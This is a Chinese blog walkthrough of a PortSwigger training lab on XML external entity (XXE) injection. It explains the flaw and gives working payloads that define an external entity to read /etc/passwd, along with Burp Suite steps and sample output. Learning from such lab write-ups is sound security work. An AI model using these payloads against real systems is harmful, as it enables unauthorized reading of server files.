Lab: Exploiting XXE using external entities to retrieve files:利用外部实体利用 XXE 来检索文件...

最新推荐文章于 2024-04-19 14:46:29 发布
最新推荐文章于 2024-04-19 14:46:29 发布
阅读量269 收藏
点赞数
文章标签: java linux mysql xml 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793637
版权

利用XXE检索文件

要执行从服务器的文件系统中检索任意文件的 XXE 注入攻击,您需要通过两种方式修改提交的 XML:

引入(或编辑)DOCTYPE定义包含文件路径的外部实体的元素。
编辑应用程序响应中返回的 XML 中的数据值,以使用定义的外部实体。
例如,假设购物应用程序通过向服务器提交以下 XML 来检查产品的库存水平:

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>381</productId></stockCheck>

该应用程序没有针对 XXE 攻击执行特定的防御,因此您可以/etc/passwd通过提交以下 XXE 负载来利用 XXE 漏洞来检索文件:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

这个 XXE 负载定义了一个外部实体,&xxe;它的值是/etc/passwd文件的内容,并使用productId值中的实体。这会导致应用程序的响应包含文件的内容:

Invalid product ID: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

靶场:

该实验室具有“检查库存”功能,可解析 XML 输入并在响应中返回任何意外值。

为了解决实验室问题,注入一个 XML 外部实体来检索/etc/passwd文件的内容。

操作:

  • 访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。
  • 在 XML 声明和stockCheck元素之间插入以下外部实体定义:
    - <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
  • 将productId数字替换为对外部实体的引用:&xxe;。响应应包含“无效的产品 ID:”,后跟/etc/passwd文件的内容。
    代码如下
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId><storeId>2</storeId></stockCheck>

image

Zeker62
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
XXE(xml外部实体攻击)
HoYim
04-11 4449
1、概念 XXEXML External Entity)是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。当包含对外部实体的引用的XML输入被弱配置XML解析器处理时,就会发生这种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 (简单来说,XXE就是XML外部实体注入。当应用程序允许引用外部实体时,通过构...
XML外部实体注入(XXE)
web1的博客
09-08 486
关键利用点:外部实体 XML是什么? XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的义的 xxe 实体进行了引用 相关实验 1、利用外部实体检索文件 1.1 访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。 1.2 在 XML 声明和stockCheck元素之间插入以下外部实体定义: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "fil
XXE攻击
qq_24702263的博客
05-15 342
XXE攻击 xml基础知识 要了解xxe漏洞,那么一定得先明白基础知识,了解xml文档的基础组成。另外php版本大于5.4.45的默认不解析外部实体 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 为什么使用 DTD? 通过 DTD,您的每一个 XML 文件均可携带一个有关其自身格式的描述。 通过 DTD,独立的团体可一致地使用某个..
xxe攻击(XML外部实体)
2301_79194110的博客
09-24 326
XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。http://www.w3school.com.cn/dtd/index.asp 了解地址。
XXE攻击指南
zz_strive_2012的专栏
07-30 386
现在许多不同的客户端技术,如web端,移动端,云端等使用XML向业务应用程序发送消息。为了使应用程序使用这些自定义的XML消息,应用程序必须去解析XML文档并检查格式是否正确。 本文将描述XML外部实体XXE)注入攻击及其基础知识,以便更好地了解如何攻击以及如何处理。 既然我们将谈论XXE注入,那么首先我们应该了解外部实体的含义以及实现的内容。 外部实体是指XML处理器必须解析的数据。它对于在多个文档之间创建共享的公共引用很有用。对外部实体进行的任何更改将在包含对其的引用的文档中自动更新。即XML使
计算机组成原理教学课件:5-Large and Fast Exploiting Memory Hierarchy.ppt
06-04
《计算机组成原理教学课件:5-Large and Fast Exploiting Memory Hierarchy》主要讲述了计算机内存层次结构的重要性和工作原理。在这个课件中,主要涵盖了以下几个关键知识点: 1. **随机存取存储器(Random Access...
Exploiting virtual synchrony in distributed systems(利用虚拟同步分布式系统).pdf
12-05
在SIS2这样的系统中,程序员可以使用传统的同步编程方法来编写应用,系统会负责处理底层的通信和同步问题。 虚拟同步对于分布式系统的设计和实现尤其重要,它使得系统可以在各种不同的环境中运行,包括那些可能出现...
008.利用堆大小差一错误爆破Linux内核-008.CVE-2016-6187 Exploiting Linux kernel
08-04
在本篇讨论中,我们将深入理解利用Linux内核中的CVE-2016-6187漏洞进行堆溢出攻击的技术细节。该漏洞源于SLUB内存分配器中堆大小差一错误,允许攻击者通过控制对象大小和特定内存布局来实现对内核内存的非法访问,...
浅谈XXE攻击
YenKoc的博客
11-24 294
二.XML基础 xml是一种用于标记电子文件使其具有结构性的标记语言,用于标记数据,和定义数据类型,可以为两种不同系统进行信息交换, XML文档结构包括xml声明,DTD文档类型定义(可选),文档元素 二.DTD文档定义,可以内部声明,也可以外部引用 <!DOCTYPE address [<!ELEMENT address (#PCDATA)> ...
XXE攻击与防御
qq_56327824的博客
03-26 7000
XXE XXE是一种很常见的漏洞类型危害也挺大的,如果一个web服务器通过用户上传处理XML文件或POST请求时,那么可能就会存在漏洞。 前段时间比较出名的微信支付的xxe漏洞 漏洞简历 XXE就是XML外部实体注入,当服务器允许引用外部实体时,同过构建恶意内容来攻击网站 产生原因 解析xml文件时允许加载外部实体,并且实体的URL支持file://和PHP://等协议,没有过滤用户提交的参数 危害 读取任意文件 执行系统命令 探测内网端口 攻击内网网站 DOS攻击 … 漏洞检测 利用burp检测那些接
PortSwigger XML外部实体注入(XXE
weixin_42451330的博客
11-21 1017
本文介绍PortSwigger靶场 XML外部实体注入(XXE),包括XXE漏洞产生原理、XXE漏洞利用方式、XXE漏洞防护措施。如有疑问欢迎私聊。
什么是XXE攻击?如何进行防护
最新发布
HoewDec的博客
04-19 1663
SSRF形成的原因是服务端提供了从其他服务器应用获取数据的功能,在用户可控的情况下,未对目标地址进行过滤与限制,导致此漏洞的产生。SSRF在攻击中扮演了中间者的角色,有时候直接攻击无法成效,通过SSRF可以利用其他主机的漏洞,攻击目标。安全性很难做到正确,即使在当今具有安全意识的世界中,也存在一些严重的漏洞,例如 XML 外部实体 (XXE),它们被忽视并最终成为破坏的原因。攻击者通常在XML文档中嵌入恶意的外部实体引用,当XML解析器处理这些文档时,会触发对外部资源的访问,进而执行攻击者指定的恶意操作。
XXE攻击指什么?其攻击原理是什么?
oldboyedu1的博客
02-13 805
也就是说服务端接收和解析了来自用户端的XML数据,而又没有做严格的安全控制,从而导致XML外部实体注入,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。XXE漏洞触发的点往往是可以上传XML文件的位置,没有对上传的XML文件进行过滤,导致可上传恶意XML文件XXE攻击是指xml外部实体攻击漏洞。XML外部实体攻击是针对解析XML输入的应用程序的一种攻击。这种攻击通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。XXE攻击原理是什么?
简学-XXE攻击从基础到实施
码农米格的博客
02-26 333
简学-XXE攻击前言XML 基础知识XML 文档的构建模块DTD (文档类型定义)DTD 实体XXE的攻击与危害(XML External Entity)如何构建外部实体注入外部实体支持的协议有哪些?XXE 攻击产生的危害如何防御 XXE 攻击 前言 在学习 OWASP TOP 10 时,Xml外部拓展(XML External Entity(XXE))位于榜单第4名,因此上网搜索了想管的 XXE 原理、攻击手段、危害即防御手段等内容来学习,以下内容均来源于转载并做重新排版方便查看学习,转载地址在结尾放
vulnhub——XXE练习
怪味巧克力的博客
04-22 596
今天写一个关于vulnhub上的关于XXE漏洞利用的一个靶场练习 0x01 首先肯定得先下载啊,这里我就不多说了,自己到vulnhub官网下载即可(百度搜官网),然后进去后搜索XXE,下载第一个。解压,安装,靶场布置完成。 0x02 首先我们发现,靶机开启以后是要登录,但是本题并没有给我们登录的账号和密码,所以,别想着去登录了(哈哈哈),那怎么办? 你可能会有疑问,我连靶场IP地址都不知道! 那...
初识XXE漏洞
Sea_Sand息禅
06-05 801
1、XXE简介 XXE全称是XML External Entity,也就是XML外部实体注入。 如果系统允许攻击者利用XML调用外部实体,那么攻击这就可以在调用外部实体时构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 2、可能的场景 很多的网站都会对xml文件进行解析,解析的时候都有可能出现可用的XXE漏洞,从而被攻击利用,攻击的方法基于实体中可以使用的协议...
XXE是什么?XXE漏洞原理及案例讲解(从0到1完全掌握XXE
白帽黑客八哥的博客
12-14 5379
XXEXML外部实体注入)是一种针对应用程序处理XML数据的方式的攻击。XML文档可以定义实体,它们是存储文档中其他地方重复使用的数据的方式。外部实体是一种特殊类型的实体,它们的内容被定义在XML文档外部XXE漏洞发生在当应用程序解析含有外部实体引用的XML文档时,没有正确地限制或禁止这些外部实体的使用。XXE是一种严重的安全漏洞,它的存在可能导致严重的安全风险。开发人员和安全专家必须了解此类漏洞的工作原理,确保在处理XML数据时采取适当的安全措施,以保护应用程序和数据的安全
XXE外部实体注入)| PortSwigger(burpsuite官方靶场)| Part 1
bin789456的博客
02-25 5055
写在前面 这个系列开始写写XXE相关的东西,这里时第一部分,相关资料及使用靶场如下: https://www.w3schools.com/xml/ https://portswigger.net/web-security/xxe 为了更方便你检索题目且由于是国外网站,会带有一定外语及翻译,开始吧 Exploiting XXE using external entities to retrieve files利用外部实体利用XXE检索文件) 打开环境 是一个商店页面的模拟,先找找可疑的点吧,点进商品
网络打印机安全研究:Exploiting Network Printers
"藏经阁-Exploiting Network Printers.pdf" 该文档主要探讨了网络打印机的安全问题及其利用方法,由Jens Müller、Vladislav Mladenov、Juraj Somorovsky和Jörg Schwenk撰写。文章分为背景、攻击、评估、PRET...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值